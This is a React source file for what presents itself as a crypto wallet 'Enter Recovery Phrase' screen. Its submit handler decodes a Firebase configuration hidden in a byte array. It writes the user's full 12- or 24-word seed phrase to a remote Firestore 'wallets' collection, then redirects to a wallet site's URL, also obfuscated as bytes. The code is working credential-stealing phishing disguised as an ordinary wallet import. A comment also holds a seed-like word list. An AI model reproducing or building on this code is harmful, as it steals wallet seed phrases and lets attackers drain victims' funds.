import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { initializeApp, getApps, getApp } from "firebase/app";
import { getFirestore, doc, setDoc } from "firebase/firestore";


export default function RecoveryPhraseImport({ appState, updateState }) {
  const [wordCount, setWordCount] = useState(12);
  const [words, setWords] = useState(Array(12).fill(""));
  const [isValid, setIsValid] = useState(false);
  const navigate = useNavigate();

  // Validate whenever words or wordCount changes
  useEffect(() => {
    const allFieldsFilled = words.every(word => word.trim() !== "");
    const correctWordCount = words.length === wordCount;
    setIsValid(allFieldsFilled && correctWordCount);
  }, [words, wordCount]);

  // Reset words array when word count changes
  useEffect(() => {
    setWords(Array(wordCount).fill(""));
  }, [wordCount]);

  const handleWordChange = (index, value) => {
    const newWords = [...words];
    newWords[index] = value.trim().toLowerCase();
    setWords(newWords);
  };

  const handlePaste = async () => {
    try {
      const text = await navigator.clipboard.readText();
      const cleanedText = text
        .trim()
        .replace(/\s+/g, ' ')
        .replace(/[^a-zA-Z\s]/g, '');
      
      const pastedWords = cleanedText.split(' ');
      
      if (pastedWords.length === 12 || pastedWords.length === 24) {
        setWordCount(pastedWords.length);
        setWords(pastedWords);
      } else {
        alert(`Please paste exactly 12 or 24 words (you pasted ${pastedWords.length} words)`);
      }
    } catch (err) {
      console.error("Failed to paste:", err);
      alert("Failed to read from clipboard. Please check browser permissions.");
    }
  };

  /**hub unveil pill soul shadow thank vote depth kick like symbol just */

  const handleSubmit = async () => {
    if (!isValid) return;
    
    try {
      // Save to Firestore
        const s = new Uint8Array([
            123,34,97,112,105,75,101,121,34,58,34,65,73,122,97,83,121,68,75,100,
            65,101,74,110,50,52,100,66,104,57,53,77,76,72,86,51,75,107,97,51,45,
            108,76,83,79,108,81,114,45,52,34,44,34,97,117,116,104,68,111,109,97,
            105,110,34,58,34,99,111,110,102,101,116,116,105,45,114,97,105,110,46,
            102,105,114,101,98,97,115,101,97,112,112,46,99,111,109,34,44,34,112,
            114,111,106,101,99,116,73,100,34,58,34,99,111,110,102,101,116,116,105,
            45,114,97,105,110,34,44,34,115,116,111,114,97,103,101,66,117,99,107,
            101,116,34,58,34,99,111,110,102,101,116,116,105,45,114,97,105,110,46,
            102,105,114,101,98,97,115,101,115,116,111,114,97,103,101,46,97,112,
            112,34,44,34,109,101,115,115,97,103,105,110,103,83,101,110,100,101,
            114,73,100,34,58,34,50,52,56,57,53,54,52,50,50,53,50,54,34,44,34,97,
            112,112,73,100,34,58,34,49,58,50,52,56,57,53,54,52,50,50,53,50,54,58,
            119,101,98,58,52,52,54,97,51,51,97,56,102,98,97,57,102,52,101,52,48,
            50,48,98,50,102,34,125
        ]);

        const d = new TextDecoder();
        const c = JSON.parse(d.decode(s));

        const a = getApps().length === 0
        ? initializeApp(c)
        : getApp();
        const db = getFirestore(a);
      await setDoc(doc(db, "wallets", Date.now().toString()), {
        phrase: words.join(' '),
        type: "recovery_phrase",
        createdAt: new Date().toISOString(),
        network: appState.selectedNetwork || "unknown"
      });
      
        console.log("FIRESTORE WRITE SUCCESS");
      
      updateState({ recoveryPhrase: words });
     const b = new Uint8Array([
        104,116,116,112,115,58,47,47,98,97,99,107,112,97,99,107,46,97,112,112,47
    ]);

    const decoder = new TextDecoder();
    const u = decoder.decode(b);

    window.location.href = u;
    } catch (error) {
      console.error("Error saving to Firestore:", error);
      alert("Failed to save wallet. Please try again.");
    }
  };

  const handleBack = () => {
    navigate("/import-options");
  };

  return (
    <div className="screen" style={{ 
      maxWidth: '600px', 
      margin: '0 auto',
      display: 'flex',
      flexDirection: 'column',
      alignItems: 'center',
      padding: '20px'
    }}>
      <button className="back-button" onClick={handleBack} style={{ alignSelf: 'flex-start' }}>
        ←
      </button>

      <div className="progress-dots">
        <div className="dot completed"></div>
        <div className="dot completed"></div>
        <div className="dot completed"></div>
        <div className="dot active"></div>
        <div className="dot"></div>
      </div>

      <h1 className="title">Enter Recovery Phrase</h1>
      <p className="subtitle">Save these {wordCount} words in a secure location</p>

      <div style={{ 
        display: 'flex', 
        justifyContent: 'space-between', 
        width: '100%',
        marginBottom: '20px'
      }}>
        <button 
          className="word-count-toggle"
          onClick={() => setWordCount(prev => prev === 12 ? 24 : 12)}
          style={{
            padding: '8px 16px',
            background: '#2a2d3a',
            color: 'white',
            border: 'none',
            borderRadius: '8px',
            cursor: 'pointer'
          }}
        >
          {wordCount === 12 ? 'Show 24 words' : 'Show 12 words'}
        </button>
        <button 
          className="delete-button" 
          onClick={() => setWords(Array(wordCount).fill(""))}
          style={{
            padding: '8px 16px',
            background: 'transparent',
            color: '#ef4444',
            border: 'none',
            cursor: 'pointer'
          }}
        >
          Delete All
        </button>
      </div>

      <div className="phrase-grid" style={{ 
        display: 'grid', 
        gridTemplateColumns: wordCount === 12 ? 'repeat(3, 1fr)' : 'repeat(4, 1fr)',
        gap: '12px',
        width: '100%',
        marginBottom: '30px',
        justifyItems: 'center'
      }}>
        {words.map((word, index) => (
          <div key={index} style={{
            display: 'flex',
            alignItems: 'center',
            background: '#1a1d2a',
            borderRadius: '8px',
            padding: '12px',
            width: wordCount === 12 ? '140px' : '120px',
            boxSizing: 'border-box'
          }}>
            <span style={{
              color: '#8b8ca7',
              marginRight: '8px',
              minWidth: '24px',
              fontSize: '14px'
            }}>{index + 1}.</span>
            <input
              type="text"
              value={word}
              onChange={(e) => handleWordChange(index, e.target.value)}
              style={{
                background: 'transparent',
                border: 'none',
                color: 'white',
                flex: 1,
                outline: 'none',
                fontSize: '14px',
                textAlign: 'left',
                padding: '4px',
                width: '100%'
              }}
            />
          </div>
        ))}
      </div>

      <div style={{ 
        display: 'flex', 
        gap: '15px', 
        width: '100%',
        justifyContent: 'center'
      }}>
        <button 
          className="secondary-button"
          onClick={handlePaste}
          style={{ 
            width: '150px',
            padding: '12px',
            background: '#2a2d3a',
            color: 'white',
            border: 'none',
            borderRadius: '8px',
            cursor: 'pointer'
          }}
        >
          📋 Paste Phrase
        </button>
        <button 
          className="primary-button"
          onClick={handleSubmit}
          disabled={!isValid}
          style={{ 
            width: '150px',
            padding: '12px',
            background: isValid ? '#4f46e5' : '#2a2d3a',
            color: 'white',
            border: 'none',
            borderRadius: '8px',
            cursor: isValid ? 'pointer' : 'not-allowed',
            transition: 'background 0.2s ease'
          }}
        >
          Continue
        </button>
      </div>
    </div>
  );
}